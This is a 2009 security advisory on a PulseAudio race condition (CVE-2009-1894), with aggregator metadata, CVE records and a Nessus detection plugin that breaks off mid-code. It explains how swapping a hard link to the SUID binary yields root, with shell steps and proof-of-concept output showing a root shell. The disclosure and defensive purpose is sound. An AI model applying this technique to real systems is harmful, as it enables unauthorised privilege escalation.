PulseAudio local race condition privilege escalation vulnerability

2009-07-18T00:00:00

Description

------------------------------------------------------------------------ PulseAudio local race condition privilege escalation vulnerability ------------------------------------------------------------------------ Yorick Koster, June 2009 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ The PulseAudio binary is affected by a local race condition. If the binary is installed as SUID root, it is possible to exploit this vulnerability to gain root privileges. This attack requires that a local attacker can create hard links on the same hard disk partition on which PulseAudio is installed (i.e. /usr/bin and /tmp reside on the same partition). ------------------------------------------------------------------------ See also ------------------------------------------------------------------------ - CVE-2009-1894 [2] - GLSA 200907-13 [3] PulseAudio: Local privilege escalation - USN-804-1 [4] PulseAudio vulnerability ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was successfully verified on the following Linux distributions: - Ubuntu 9.04 running PulseAudio version 0.9.14 - Debian 5.0 running PulseAudio version 0.9.10 - Mandriva Linux 2009 Spring running PulseAudio version 0.9.15 ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ A patch for PulseAudio was released that addresses this issue. This patch can be obtained from the following location: http://git.0pointer.de/?p=pulseaudio.git;a=commit;h=84200b423ebfa7e2dad9b1b65f64eac7bf3d2114 As a temporary workaround, remove the SUID bit from the PulseAudio binary. $ chmod u-s `which pulseaudio` ------------------------------------------------------------------------ Introduction ------------------------------------------------------------------------ PulseAudio [5] is a sound server for POSIX and Win32 systems. A sound server is basically a proxy for your sound applications. It allows you to do advanced operations on your sound data as it passes between your application and your hardware. On some systems, the PulseAudio binary is installed SUID root to enable real-time scheduling. If set, the daemon will drop root privileges immediately on startup, however it will retain the CAP_NICE capability (on systems that support it), but only if the calling user is a member of the pulse-rt group. For all other users all capabilities are dropped immediately. ------------------------------------------------------------------------ Race condition ------------------------------------------------------------------------ If the PulseAudio binary is started on Linux systems, it checks if the LD_BIND_NOW environment variable is set. If this is not the case, PulseAudio will set the variable and it will reload itself. It tries to determine its path name by looking at the /proc/self/exe symbolic link. This symbolic link will point to the full path name of the current process. int main(int argc, char *argv[]) { [...] #if defined(__linux__) && defined(__OPTIMIZE__) /* Disable lazy relocations to make usage of external libraries more deterministic for our RT threads. We abuse __OPTIMIZE__ as a check whether we are a debug build or not. */ if (!getenv("LD_BIND_NOW")) { char *rp; /* We have to execute ourselves, because the libc caches the * value of $LD_BIND_NOW on initialization. */ pa_set_env("LD_BIND_NOW", "1"); pa_assert_se(rp = pa_readlink("/proc/self/exe")); pa_assert_se(execv(rp, argv) == 0); } #endif Normally, /proc/self/exe will point to something like /usr/bin/pulseaudio. However by using hard links, it is possible to cause /proc/self/exe to point to a different location. $ cd /tmp $ ls -la /proc/self/exe lrwxrwxrwx 1 yorick yorick 0 2009-06-09 16:31 /proc/self/exe -> /bin/ls $ ln `which ls` ls $ ./ls -la /proc/self/exe lrwxrwxrwx 1 yorick yorick 0 2009-06-09 16:31 /proc/self/exe -> /tmp/ls In addition, if a hard link is created, the SUID bit is preserved. $ ln `which pulseaudio` pulseaudio $ ls -la pulseaudio -rwsr-xr-x 2 root root 71616 2009-04-09 02:12 pulseaudio A race condition exists in the reload mechanism of PulseAudio. An attacker can exploit this issue by creating a hard link pointing to the PulseAudio binary. After this it can execute this binary through the hard link. At this moment /proc/sef/exe will point to the hard link. Before PulseAudio is restarted, the attacker can replace the hard link with a different (executable) file or (symbolic) link. If PulseAudio is restarted, it will use a path name that at this moment points to a different file, for example a command shell. Root privileges are not dropped when PulseAudio is reloading, thus allowing a local attacker to gain root privileges. Please note, this attack is only possible if the attacker can create hard links on the same hard disk partition on which PulseAudio is installed (i.e. /usr/bin and /tmp reside on the same partition). ------------------------------------------------------------------------ Proof of concept ------------------------------------------------------------------------ The following proof of concept can be used to exploit this issue. The proof of concept tries to exploit this issue by creating hard links in the /tmp directory. pa_race [6] $ ./pa_race I: caps.c: Limited capabilities successfully to CAP_SYS_NICE. I: caps.c: Dropping root privileges. I: caps.c: Limited capabilities successfully to CAP_SYS_NICE. N: main.c: Called SUID root and real-time and/or high-priority scheduling was requested in the configuration. However, we lack the necessary privileges: N: main.c: We are not in group 'pulse-rt', PolicyKit refuse to grant us the requested privileges and we have no increase RLIMIT_NICE/RLIMIT_RTPRIO resource limits. N: main.c: For enabling real-time/high-priority scheduling please acquire the appropriate PolicyKit privileges, or become a member of 'pulse-rt', or increase the RLIMIT_NICE/RLIMIT_RTPRIO resource limits for this user. E: pid.c: Daemon already running. E: main.c: pa_pid_file_create() failed. [...] uid=0(root) gid=0(root) groups=4(adm), 20(dialout), 24(cdrom), 25(floppy), 29(audio), 30(dip), 44(video), 46(plugdev), 107(fuse), 109(lpadmin), 115(admin), 1000(yorick) # ------------------------------------------------------------------------ References ------------------------------------------------------------------------ [1] http://www.akitasecurity.nl/advisory.php?id=AK20090602 [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1894 [3] http://www.gentoo.org/security/en/glsa/glsa-200907-13.xml [4] http://www.ubuntu.com/usn/usn-804-1 [5] http://pulseaudio.org/ [6] http://www.akitasecurity.nl/advisory/AK20090602/pa_race ------------------------------------------------------------------------ -- ------------------------------------------------------------------------ Akita Software Security (Kvk 37144957) http://www.akitasecurity.nl/ ------------------------------------------------------------------------ Key fingerprint = 5FC0 F50C 8B3A 4A61 7A1F 2BFF 5482 D26E D890 5A65 http://keyserver.pgp.com/vkd/DownloadKey.event?keyid=0x5482D26ED8905A65

{"id": "SECURITYVULNS:DOC:22183", "bulletinFamily": "software", "title": "PulseAudio local race condition privilege escalation vulnerability", "description": "------------------------------------------------------------------------\r\nPulseAudio local race condition privilege escalation vulnerability\r\n------------------------------------------------------------------------\r\nYorick Koster, June 2009\r\n\r\n------------------------------------------------------------------------\r\nAbstract\r\n------------------------------------------------------------------------\r\n\r\nThe PulseAudio binary is affected by a local race condition. If the \r\nbinary is installed as SUID root, it is possible to exploit this \r\nvulnerability to gain root privileges. This attack requires that a local\r\nattacker can create hard links on the same hard disk partition on which\r\nPulseAudio is installed (i.e. /usr/bin and /tmp reside on the same \r\npartition).\r\n\r\n------------------------------------------------------------------------\r\nSee also\r\n------------------------------------------------------------------------\r\n\r\n- CVE-2009-1894 [2]\r\n- GLSA 200907-13 [3] PulseAudio: Local privilege escalation\r\n- USN-804-1 [4] PulseAudio vulnerability\r\n\r\n------------------------------------------------------------------------\r\nTested version\r\n------------------------------------------------------------------------\r\n\r\nThis issue was successfully verified on the following Linux \r\ndistributions:\r\n\r\n- Ubuntu 9.04 running PulseAudio version 0.9.14\r\n- Debian 5.0 running PulseAudio version 0.9.10\r\n- Mandriva Linux 2009 Spring running PulseAudio version 0.9.15\r\n\r\n------------------------------------------------------------------------\r\nFix\r\n------------------------------------------------------------------------\r\n\r\nA patch for PulseAudio was released that addresses this issue. This \r\npatch can be obtained from the following location:\r\n\r\nhttp://git.0pointer.de/?p=pulseaudio.git;a=commit;h=84200b423ebfa7e2dad9b1b65f64eac7bf3d2114\r\n\r\nAs a temporary workaround, remove the SUID bit from the PulseAudio \r\nbinary.\r\n\r\n$ chmod u-s `which pulseaudio`\r\n\r\n------------------------------------------------------------------------\r\nIntroduction\r\n------------------------------------------------------------------------\r\n\r\nPulseAudio [5] is a sound server for POSIX and Win32 systems. A sound \r\nserver is basically a proxy for your sound applications. It allows you \r\nto do advanced operations on your sound data as it passes between your \r\napplication and your hardware.\r\n\r\nOn some systems, the PulseAudio binary is installed SUID root to enable \r\nreal-time scheduling. If set, the daemon will drop root privileges \r\nimmediately on startup, however it will retain the CAP_NICE capability \r\n(on systems that support it), but only if the calling user is a member \r\nof the pulse-rt group. For all other users all capabilities are dropped \r\nimmediately.\r\n\r\n------------------------------------------------------------------------\r\nRace condition\r\n------------------------------------------------------------------------\r\n\r\nIf the PulseAudio binary is started on Linux systems, it checks if the \r\nLD_BIND_NOW environment variable is set. If this is not the case, \r\nPulseAudio will set the variable and it will reload itself. It tries to \r\ndetermine its path name by looking at the /proc/self/exe symbolic link. \r\nThis symbolic link will point to the full path name of the current \r\nprocess.\r\n\r\nint main(int argc, char *argv[]) {\r\n[...]\r\n#if defined(__linux__) && defined(__OPTIMIZE__)\r\n /*\r\n Disable lazy relocations to make usage of external libraries\r\n more deterministic for our RT threads. We abuse __OPTIMIZE__ as\r\n a check whether we are a debug build or not.\r\n */\r\n \r\n if (!getenv("LD_BIND_NOW")) {\r\n char *rp;\r\n \r\n /* We have to execute ourselves, because the libc caches the\r\n * value of $LD_BIND_NOW on initialization. */\r\n \r\n pa_set_env("LD_BIND_NOW", "1");\r\n pa_assert_se(rp = pa_readlink("/proc/self/exe"));\r\n pa_assert_se(execv(rp, argv) == 0);\r\n }\r\n#endif\r\n\r\nNormally, /proc/self/exe will point to something like \r\n/usr/bin/pulseaudio. However by using hard links, it is possible to \r\ncause /proc/self/exe to point to a different location.\r\n\r\n$ cd /tmp\r\n$ ls -la /proc/self/exe\r\nlrwxrwxrwx 1 yorick yorick 0 2009-06-09 16:31 /proc/self/exe -> \r\n/bin/ls\r\n$ ln `which ls` ls\r\n$ ./ls -la /proc/self/exe\r\nlrwxrwxrwx 1 yorick yorick 0 2009-06-09 16:31 /proc/self/exe -> \r\n/tmp/ls\r\n\r\nIn addition, if a hard link is created, the SUID bit is preserved.\r\n\r\n$ ln `which pulseaudio` pulseaudio\r\n$ ls -la pulseaudio \r\n-rwsr-xr-x 2 root root 71616 2009-04-09 02:12 pulseaudio\r\n\r\nA race condition exists in the reload mechanism of PulseAudio. An \r\nattacker can exploit this issue by creating a hard link pointing to the \r\nPulseAudio binary. After this it can execute this binary through the \r\nhard link. At this moment /proc/sef/exe will point to the hard link. \r\nBefore PulseAudio is restarted, the attacker can replace the hard link \r\nwith a different (executable) file or (symbolic) link. If PulseAudio is \r\nrestarted, it will use a path name that at this moment points to a \r\ndifferent file, for example a command shell. Root privileges are not \r\ndropped when PulseAudio is reloading, thus allowing a local attacker to \r\ngain root privileges.\r\n\r\nPlease note, this attack is only possible if the attacker can create \r\nhard links on the same hard disk partition on which PulseAudio is \r\ninstalled (i.e. /usr/bin and /tmp reside on the same partition).\r\n\r\n------------------------------------------------------------------------\r\nProof of concept\r\n------------------------------------------------------------------------\r\n\r\nThe following proof of concept can be used to exploit this issue. The \r\nproof of concept tries to exploit this issue by creating hard links in \r\nthe /tmp directory.\r\n\r\npa_race [6]\r\n\r\n$ ./pa_race\r\nI: caps.c: Limited capabilities successfully to CAP_SYS_NICE.\r\nI: caps.c: Dropping root privileges.\r\nI: caps.c: Limited capabilities successfully to CAP_SYS_NICE.\r\nN: main.c: Called SUID root and real-time and/or high-priority \r\nscheduling was requested in the configuration. However, we lack the \r\nnecessary privileges:\r\nN: main.c: We are not in group 'pulse-rt', PolicyKit refuse to\r\n grant us the requested privileges and we have no increase \r\nRLIMIT_NICE/RLIMIT_RTPRIO resource limits.\r\nN: main.c: For enabling real-time/high-priority scheduling please \r\nacquire the appropriate PolicyKit privileges, or become a member of \r\n'pulse-rt', or increase the RLIMIT_NICE/RLIMIT_RTPRIO resource\r\n limits for this user.\r\nE: pid.c: Daemon already running.\r\nE: main.c: pa_pid_file_create() failed.\r\n[...]\r\nuid=0(root) gid=0(root) groups=4(adm), 20(dialout), 24(cdrom), \r\n25(floppy), 29(audio), 30(dip), 44(video), 46(plugdev), 107(fuse), \r\n109(lpadmin), 115(admin), 1000(yorick)\r\n# \r\n\r\n------------------------------------------------------------------------\r\nReferences\r\n------------------------------------------------------------------------\r\n\r\n[1] http://www.akitasecurity.nl/advisory.php?id=AK20090602\r\n[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1894\r\n[3] http://www.gentoo.org/security/en/glsa/glsa-200907-13.xml\r\n[4] http://www.ubuntu.com/usn/usn-804-1\r\n[5] http://pulseaudio.org/\r\n[6] http://www.akitasecurity.nl/advisory/AK20090602/pa_race\r\n\r\n------------------------------------------------------------------------\r\n-- \r\n------------------------------------------------------------------------\r\nAkita Software Security (Kvk 37144957)\r\nhttp://www.akitasecurity.nl/\r\n------------------------------------------------------------------------\r\nKey fingerprint = 5FC0 F50C 8B3A 4A61 7A1F 2BFF 5482 D26E D890 5A65\r\nhttp://keyserver.pgp.com/vkd/DownloadKey.event?keyid=0x5482D26ED8905A65", "published": "2009-07-18T00:00:00", "modified": "2009-07-18T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22183", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2009-1894"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:31", "edition": 1, "viewCount": 1841, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1894"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1838-1:2C084"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2009-1894"]}, {"type": "exploitdb", "idList": ["EDB-ID:15274"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:FC124E21A6FD828BCB8AB10DC2D60915"]}, {"type": "gentoo", "idList": ["GLSA-200907-13"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-1838.NASL", "GENTOO_GLSA-200907-13.NASL", "MANDRIVA_MDVSA-2009-152.NASL", "UBUNTU_USN-804-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231064394", "OPENVAS:136141256231064435", "OPENVAS:136141256231064476", "OPENVAS:136141256231064503", "OPENVAS:64394", "OPENVAS:64435", "OPENVAS:64445", "OPENVAS:64476", "OPENVAS:64503"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:94955"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:24977", "SECURITYVULNS:VULN:10079"]}, {"type": "seebug", "idList": ["SSV:11842", "SSV:70027"]}, {"type": "ubuntu", "idList": ["USN-804-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2009-1894"]}], "rev": 4}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2009-1894"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1838-1:2C084"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2009-1894"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:FC124E21A6FD828BCB8AB10DC2D60915"]}, {"type": "gentoo", "idList": ["GLSA-200907-13"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-1838.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231064435"]}, {"type": "seebug", "idList": ["SSV:11842"]}, {"type": "ubuntu", "idList": ["USN-804-1"]}]}, "exploitation": null, "vulnersScore": 7.2}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}

{"cve": [{"lastseen": "2022-03-23T21:28:02", "description": "Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gain privileges via vectors involving creation of a hard link, related to the application setting LD_BIND_NOW to 1, and then calling execv on the target of the /proc/self/exe symlink.", "cvss3": {}, "published": "2009-07-17T16:30:00", "type": "cve", "title": "CVE-2009-1894", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2018-10-10T19:38:00", "cpe": ["cpe:/a:pulseaudio:pulseaudio:0.9.14", "cpe:/a:pulseaudio:pulseaudio:0.9.10", "cpe:/a:pulseaudio:pulseaudio:0.9.9"], "id": "CVE-2009-1894", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1894", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:pulseaudio:pulseaudio:0.9.10:*:*:*:*:*:*:*", "cpe:2.3:a:pulseaudio:pulseaudio:0.9.14:*:*:*:*:*:*:*", "cpe:2.3:a:pulseaudio:pulseaudio:0.9.9:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T21:28:03", "description": "The tun_chr_poll function in drivers/net/tun.c in the tun subsystem in the Linux kernel 2.6.30 and 2.6.30.1, when the -fno-delete-null-pointer-checks gcc option is omitted, allows local users to gain privileges via vectors involving a NULL pointer dereference and an mmap of /dev/net/tun, a different vulnerability than CVE-2009-1894.", "cvss3": {}, "published": "2009-07-20T17:30:00", "type": "cve", "title": "CVE-2009-1897", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894", "CVE-2009-1897"], "modified": "2017-08-17T01:30:00", "cpe": ["cpe:/o:linux:linux_kernel:2.6.30", "cpe:/o:linux:linux_kernel:2.6.30.1"], "id": "CVE-2009-1897", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1897", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.6.30:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.30:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.30.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.30:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.30:rc7-git6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.30:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.30:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.30:rc4:x86_32:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-08-19T13:07:16", "description": "A vulnerability has been found and corrected in pulseaudio :\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered that pulseaudio, when installed setuid root, does not drop privileges before re-executing itself to achieve immediate bindings. This can be exploited by a user who has write access to any directory on the file system containing /usr/bin to gain local root access. The user needs to exploit a race condition related to creating a hard link (CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.", "cvss3": {"score": null, "vector": null}, "published": "2009-07-20T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : pulseaudio (MDVSA-2009:152)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:lib64pulseaudio-devel", "p-cpe:/a:mandriva:linux:lib64pulseaudio0", "p-cpe:/a:mandriva:linux:lib64pulsecore5", "p-cpe:/a:mandriva:linux:lib64pulseglib20", "p-cpe:/a:mandriva:linux:lib64pulsezeroconf0", "p-cpe:/a:mandriva:linux:libpulseaudio-devel", "p-cpe:/a:mandriva:linux:libpulseaudio0", "p-cpe:/a:mandriva:linux:libpulsecore5", "p-cpe:/a:mandriva:linux:libpulseglib20", "p-cpe:/a:mandriva:linux:libpulsezeroconf0", "p-cpe:/a:mandriva:linux:pulseaudio", "p-cpe:/a:mandriva:linux:pulseaudio-esound-compat", "p-cpe:/a:mandriva:linux:pulseaudio-module-bluetooth", "p-cpe:/a:mandriva:linux:pulseaudio-module-gconf", "p-cpe:/a:mandriva:linux:pulseaudio-module-jack", "p-cpe:/a:mandriva:linux:pulseaudio-module-lirc", "p-cpe:/a:mandriva:linux:pulseaudio-module-x11", "p-cpe:/a:mandriva:linux:pulseaudio-module-zeroconf", "p-cpe:/a:mandriva:linux:pulseaudio-utils", "cpe:/o:mandriva:linux:2008.1", "cpe:/o:mandriva:linux:2009.0", "cpe:/o:mandriva:linux:2009.1"], "id": "MANDRIVA_MDVSA-2009-152.NASL", "href": "https://www.tenable.com/plugins/nessus/39871", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:152. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39871);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1894\");\n script_xref(name:\"MDVSA\", value:\"2009:152\");\n\n script_name(english:\"Mandriva Linux Security Advisory : pulseaudio (MDVSA-2009:152)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been found and corrected in pulseaudio :\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered\nthat pulseaudio, when installed setuid root, does not drop privileges\nbefore re-executing itself to achieve immediate bindings. This can be\nexploited by a user who has write access to any directory on the file\nsystem containing /usr/bin to gain local root access. The user needs\nto exploit a race condition related to creating a hard link\n(CVE-2009-1894).\n\nThis update provides fixes for this vulnerability.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pulseaudio-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pulseaudio0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pulsecore5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pulseglib20\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64pulsezeroconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpulseaudio-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpulseaudio0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpulsecore5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpulseglib20\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpulsezeroconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-esound-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-module-bluetooth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-module-gconf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-module-jack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-module-lirc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-module-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-module-zeroconf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:pulseaudio-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64pulseaudio-devel-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64pulseaudio0-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64pulsecore5-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64pulseglib20-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64pulsezeroconf0-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpulseaudio-devel-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpulseaudio0-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpulsecore5-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpulseglib20-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libpulsezeroconf0-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-esound-compat-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-module-bluetooth-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-module-gconf-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-module-jack-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-module-lirc-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-module-x11-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-module-zeroconf-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"pulseaudio-utils-0.9.9-7.3mdv2008.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64pulseaudio-devel-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64pulseaudio0-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64pulsecore5-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64pulseglib20-0.9.10-11.2mdv2009.0\", yank:\"mdv\")) flag++;\nif 